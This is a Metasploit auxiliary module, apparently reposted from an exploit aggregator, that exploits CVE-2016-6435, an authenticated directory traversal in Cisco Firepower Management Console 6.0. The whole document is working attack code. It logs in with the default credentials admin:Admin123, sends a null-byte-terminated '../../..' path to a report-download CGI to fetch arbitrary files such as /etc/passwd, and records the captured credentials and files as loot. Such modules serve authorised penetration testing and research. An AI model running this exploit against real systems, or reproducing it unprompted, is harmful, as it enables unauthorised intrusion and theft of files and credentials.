Share
## https://sploitus.com/exploit?id=PACKETSTORM:181052
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal",
'Description' => %q{
This module exploits a directory traversal vulnerability in Cisco Firepower Management
under the context of www user. Authentication is required to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt', # Original discovery && PoC
'sinn3r', # Metasploit module
],
'References' =>
[
['CVE', '2016-6435'],
['URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking']
],
'DisclosureDate' => '2016-10-10',
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'Auto'
}
))
register_options(
[
# admin:Admin123 is the default credential for 6.0.1
OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd'])
])
end
def do_login(ip)
console_user = datastore['USERNAME']
console_pass = datastore['PASSWORD']
uri = normalize_uri(target_uri.path, 'login.cgi')
print_status("Attempting to login in as #{console_user}:#{console_pass}")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'username' => console_user,
'password' => console_pass,
'target' => ''
}
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
end
res_cookie = res.get_cookies
if res.code == 302 && res_cookie.include?('CGISESSID')
cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
vprint_status("CGI Session ID: #{cgi_sid}")
print_good("Authenticated as #{console_user}:#{console_pass}")
report_cred(ip: ip, user: console_user, password: console_pass)
return cgi_sid
end
nil
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: rport,
service_name: 'cisco',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def download_file(cgi_sid, file)
file_path = "../../..#{Rex::FileUtils.normalize_unix_path(file)}\x00"
print_status("Requesting: #{file_path}")
send_request_cgi({
'method' => 'GET',
'cookie' => "CGISESSID=#{cgi_sid}",
'uri' => normalize_uri(target_uri.path, 'events/reports/view.cgi'),
'vars_get' => {
'download' => '1',
'files' => file_path
}
})
end
def remote_file_exists?(res)
(
res.headers['Content-Disposition'] &&
res.headers['Content-Disposition'].match(/attachment; filename=/) &&
res.headers['Content-Type'] &&
res.headers['Content-Type'] == 'application/octet-stream'
)
end
def save_file(res, ip)
fname = res.headers['Content-Disposition'].scan(/filename=(.+)/).flatten.first || File.basename(datastore['FILEPATH'])
path = store_loot(
'cisco.https',
'application/octet-stream',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
def run_host(ip)
cgi_sid = do_login(ip)
unless cgi_sid
fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
end
res = download_file(cgi_sid, datastore['FILEPATH'])
if res.nil?
print_error("Connection timed out while downloading: #{datastore['FILEPATH']}")
elsif remote_file_exists?(res)
save_file(res, ip)
else
print_error("Remote file not found: #{datastore['FILEPATH']}")
end
end
end